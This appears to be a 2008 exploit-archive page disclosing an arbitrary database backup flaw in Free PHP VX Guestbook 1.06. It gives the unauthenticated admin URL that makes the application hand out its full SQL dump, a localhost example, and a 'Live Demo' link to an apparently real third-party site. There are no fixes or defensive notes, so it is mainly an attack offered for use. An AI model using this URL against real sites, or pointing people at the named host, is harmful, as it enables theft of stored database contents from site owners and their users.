[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Free PHP VX Guestbook 1.06 Arbitrary Database Backup Vulnerability
# Published : 2008-09-13
# Author : SirGod
# Previous Title : Linkarity (link.php) Remote SQL Injection Vulnerability
# Next Title : Sports Clubs Web Panel 0.0.1 Remote File Upload Vulnerability


###############################################################################################
[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database
[+] Discovered By SirGod 
[+] wWw.MorTal-TeaM.OrG                   
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke                    
################################################################################################

 [+] Arbitrary Backup Database

  Follow the example and the database download will begin :

   [dbname]_db_backup.sql

 
  PoC :

    http://[target]/[path]/admin/backupdb.php

  Example :

    http://127.0.0.1/book/admin/backupdb.php

  Live Demo :

    http://phpversion.com/book/admin/backupdb.php


################################################################################################

# www.Syue.com [2008-09-13]